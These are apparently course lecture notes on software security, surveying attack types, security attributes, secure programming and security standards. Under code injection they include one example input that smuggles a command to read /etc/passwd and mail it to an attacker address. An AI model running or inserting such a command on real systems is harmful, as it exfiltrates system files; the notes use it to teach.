ISEC0511 Programming for Information System Security Lecture Notes #2 Security in Software Systems

Vulnerability and Attacks Vulnerability is a weak point in a system. There several ways in which vulnerabilities can be discovered. Exploiting Vulnerability Once a security vulnerability is known, how to exploit it is also known. What is not easily known is who has the device with the vulnerability and how to reach it. Scanning systems in the network is a way to discover targets.

Vulnerability and Attacks Passive Attacks When a hacker eavesdrops on your system or monitors the transmitted packets, it is a passive attack. Sensitive information such as credit card information can be discovered using this technique. This is also called a sniffing attack.

Vulnerability and Attacks Active Attacks The original object is disturbed or manipulated. The hacker can impersonate you and log into the remote system as you. Hacking The process of exploiting vulnerabilities and launching an attack on computers is called hacking. Hackers hack computers, networks, and telephone systems for profit, sometimes even for fun.

Vulnerability and Attacks Social Engineering Social engineering is a technique used by adversaries to manipulate the social and psychological behavior of people to gain access to information or do something that they will not do in a different social setup. Identity Theft This is in order to get financial identity, personal identity, medical records, business or commercial identity. Phishing E-mail scam

Various Security Attacks Brute-Force Attacks Try to find the right combination of password or encryption key. The attack is also used by researchers to test the strength of encryption algorithm. Key strength is exponential to key size.

Various Security Attacks Authentication Attacks In telecom network, a device is authenticated. In data network, a user is authenticated. Dictionary Attack Passwords should never be based on known information. The attack is also used to discover emails.

Various Security Attacks Replay Attack Ali Baba did not know the meaning of this phrase; he heard the bandits use. In a replay attack, the adversary replays a genuine message captured earlier to perform a function intended for a legitimate user. Password Guessing Knowing user ID is relatively easy. It is likely that we have a common user ID and password for many accounts (banks, ATM, emails, credit cards) Password Sniffing

Various Security Attacks Spoofing attack Spoofed IP Spoofed emails Spoofed SMS Denial-of-Service Attacks Distributed Denial-of-Service Attack Half-Open Attack or SYN-Flooding Denial of Service through User-ID Lock Attack Ping of Death Attack Smurf Attack

Various Security Attacks Packet Sniffer Tcpdump and Ethereal (Wireshark)

Taking Control of Application To take control of applications, you need to make user execute your code. Overflow Attack Stack Smashing Attack Remote Procedure Call Attack Code Injection Attacks echo Welcome $1 $2 $3 $4 hi;cat /etc/passwd|mail bad@attacker.com Luring Attack

Computer Security Physical Security Operating System Security Shell Security File System Security Kernel Security Network Security

Typical Security in Data Network

Counter External Threats Stopping Attacker the application should use all possible defenses to protect itself and all its data. Firewall Intrusion Detection System Intrusion Prevention System Honeypot Penetration Test and Ethical Hacking

Security Programming A programmer has a responsibility to ensure that the code written is secure and safe with minimum or no known vulnerability. Security bugs have a very high impact.

Security Attributes Confidentiality Integrity A mechanism through which we keep the meaning of information or data secret. This property is also known as privacy or encryption. Integrity A property through which you can detect whether your message or data have been corrupted or tampered with.

Security Attributes Availability It is necessary that the service is available for the period it is advertised. Any attack on availability is called a DoS attack.

Security Attributes Authentication Authentication is a process by which we validate the identity of the parties. In nonrepudiation we identify the identity of these parties beyond any doubt. Digital signatures can achieve nonrepudiation. One-factor authentication, Two-factor authentication, Multi-factor authentication.

Security Attributes Authorization Usage constraints on objects based on security level or privilege of the subject. This attribute is also called fine-grained access control or role-based security.

Security Attributes Accounting Anonymity Accounting is the process by which the usage of a service is metered. Audit trails and logs for transactions in an application can also be considered as part of the accounting information. These files need security so that adversaries cannot tamper or delete them. Anonymity A property through which the user is anonymous to the external world.

Secured Programming In secured programming you use the security attributes to ensure that the input data are secure. Also, you use these attributes to ensure that the processed information is secured. You make the data and information secure using security algorithms, security protocols, and secured programming.

Safe Programming You as a programmer need to ensure that whatever program you write does not have any security vulnerability. The bottom line is that the programs you write need to be robust and failsafe.

Vulnerability Remediation To minimize the security risks posed by software vulnerabilities, a two-step approach is necessary. First, minimize the number of vulnerabilities in the software that is being developed, and Second, minimize the number of vulnerabilities in the software that have already been deployed.

Vulnerability Remediation Reducing the number of new vulnerabilities in the new software is the focus of secured and safe programming, while removing existing vulnerabilities is the focus of vulnerability remediation.

Database Security Database Authentication Database Privileges Secure Metadata Customize Access to Information Views and Stored procedures High Availability Database Database Encryption

Security Standards Public-Key Cryptographic Standards standards accepted as de facto standards for public key cryptography helping interoperability between applications using cryptography for security. CERT: Computer Emergency Response Team – www.cert.org OWASP: Open Web Application Security Project) – www.owasp.org

Security Standards NIST: National Institute of Standards and Technology – crsc.nist.gov OASIS: Organization for the Advancement of Structured Information Standards SSE-CMM: System Security Engineering Capability Maturity Model – www.sse-cmm.org ISO17799

Readings Architecting Secure Software Systems, Chapter 1.